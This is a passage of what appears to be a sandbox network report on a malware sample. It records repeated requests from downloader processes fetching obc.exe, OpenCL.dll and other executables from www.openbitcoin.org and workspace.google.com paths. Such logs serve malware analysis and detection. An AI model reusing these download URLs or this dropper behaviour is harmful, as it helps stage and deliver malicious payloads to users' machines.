    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:47 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:47 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:47 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:48 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:48 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:48 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 71
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:48 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 77
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:48 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:48 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:48 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:48 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:48 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:52 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:49 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:49 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 72
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 72
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 72
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:49 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 72
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 72
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:50 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 76
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:50 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:51 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:55 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:52 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:52 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:53 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 76
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 79
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:53 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:56 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 77
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 80
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:55 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:55 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
